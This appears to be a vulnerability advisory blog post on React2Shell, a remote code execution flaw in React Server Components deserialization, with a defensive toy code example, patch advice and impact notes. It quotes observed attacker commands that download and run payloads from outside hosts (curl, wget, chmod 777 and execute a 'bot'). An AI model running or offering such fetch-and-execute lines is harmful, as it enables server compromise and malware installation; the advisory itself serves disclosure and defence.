The critical vulnerability, known as React2Shell, resides in the insecure deserialization of the React Flight protocol used by React Server Components (RSC). The flaw is in the `reviveModel` function within ReactFlightReplyServer.js, which fails to properly validate whether object properties belong to the object itself or are inherited from its prototype. An attacker can craft a malicious serialized payload in which a chunk references itself using the `$@` prefix, creating a loop. By controlling an object’s `hasOwnProperty` method, the attacker bypasses security checks and gains access to the JavaScript prototype chain, traversing from `__proto__` to the `Function` constructor.
The exploit involves a four-stage chain. First, a self-referencing loop exposes internal React objects. Second, the attacker sets a `then` property on a chunk, tricking JavaScript’s `await` into automatically executing attacker-controlled code by calling React’s internal `initializeModelChunk` function. Third, the malicious chunk, with a status of “resolved_model”, feeds a crafted payload into the initialization process. Finally, execution is achieved by abusing the `$B` (Blob) prefix handler. The attacker points the `_formData.get` method to the `Function` constructor, causing the server to execute an arbitrary string as JavaScript code with Node.js privileges. This allows a single unauthenticated HTTP request to achieve remote code execution on the server.
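The root-cause class described above (an own-property check that trusts a method looked up on untrusted input) is easy to reproduce in miniature. The following toy deserializer is an added example, not React’s `reviveModel` or any code from the advisory; `revive`, `isOwnVulnerable`, `isOwnHardened` and the constructed input are hypothetical names used only for illustration.

```javascript
// Toy deserializer added to illustrate the React2Shell root-cause class:
// an "is this key the object's own?" check that calls a method looked up
// on the untrusted object. Not React's reviveModel; inputs are constructed.

const DANGEROUS_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable pattern: hasOwnProperty is resolved through the object's own
// prototype chain, so whoever shapes the object controls the answer.
function isOwnVulnerable(obj, key) {
  return obj.hasOwnProperty(key);
}

// Hardened pattern: borrow the intrinsic method, so the object itself is
// never consulted (Object.hasOwn(obj, key) is the modern equivalent).
function isOwnHardened(obj, key) {
  return Object.prototype.hasOwnProperty.call(obj, key);
}

// Copy only keys the checker reports as own into a null-prototype target,
// refusing keys that would reach into the prototype chain.
function revive(untrusted, isOwn) {
  const out = Object.create(null);
  for (const key in untrusted) {              // for...in also walks inherited keys
    if (DANGEROUS_KEYS.has(key)) throw new Error(`rejected key: ${key}`);
    if (isOwn(untrusted, key)) out[key] = untrusted[key];
  }
  return out;
}

// Constructed input: an object whose hasOwnProperty has been replaced by a
// function that always answers "yes" (models an attacker-controlled object
// reached through a self-referencing chunk).
function attackerShapedObject() {
  const liar = { hasOwnProperty: () => true };
  const obj = Object.create(liar);            // inherits the lying method
  obj.name = 'legit';
  return obj;
}

// Compare what each checker lets through for the same input.
function demo() {
  const obj = attackerShapedObject();
  return {
    vulnerableKeys: Object.keys(revive(obj, isOwnVulnerable)).sort(), // inherited key leaks in
    hardenedKeys: Object.keys(revive(obj, isOwnHardened)).sort(),     // only 'name'
  };
}
```

The same vulnerable check also turns a plain JSON body with an own `"hasOwnProperty"` string key into a thrown TypeError, which is the denial-of-service side of this bug class.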
dailycve form:
Platform: React/Next.js Ecosystem
Version: 19.0.0-19.2.0
Vulnerability: Remote Code Execution
Severity: Critical (10.0)
Date: 2025-12-03
Prediction: 2025-12-11
What Undercode Say:
Analytics
- Widespread exploitation observed within days of disclosure by cybercrime and espionage groups.
- Common post-exploitation payloads include MINOCAT tunneler, SNOWLIGHT downloader, HISONIC/COMPOOD backdoors, and XMRig cryptocurrency miners.
- Attackers harvest cloud credentials (AWS, Azure, GCP) and deploy secret discovery tools like TruffleHog.
Bash commands and codes related to the blog
- `curl -fsSL -m180 reactcdn.windowserrorapis[.]com:443/?h=… -o …`
- `wget http://45.76.155[.]14/vim -O /tmp/vim`
- `cd /tmp; wget hxxp://gfxnick[.]emerald[.]usbx[.]me/bot; chmod 777 bot; ./bot…`
How the Exploit Works:
- Exploit chains abuse prototype pollution via self-referencing Flight protocol chunks.
- Attackers hijack `then` property to trigger malicious code execution during deserialization.
- The `$B` blob handler is weaponized to call the `Function` constructor with attacker-controlled strings.
Protection from this CVE
- Patch immediately to React 19.0.1, 19.1.2, 19.2.1 or higher; or Next.js 15.0.5, 16.0.7 or higher.
- Use the official tool: `npx fix-react2shell-next`.
- Apply Web Application Firewall (WAF) rules to block exploit patterns.
- Rotate all application secrets and environment variables post-patch.
Impact:
- Full server compromise allowing arbitrary command execution.
- Theft of sensitive data, API keys, and cloud credentials.
- Deployment of persistent backdoors, tunnels, and cryptominers.
- Disruption via Denial-of-Service from related CVEs (CVE-2025-55184, CVE-2025-67779).
Sources:
Reported By: github.com
Extra Source Hub:
Undercode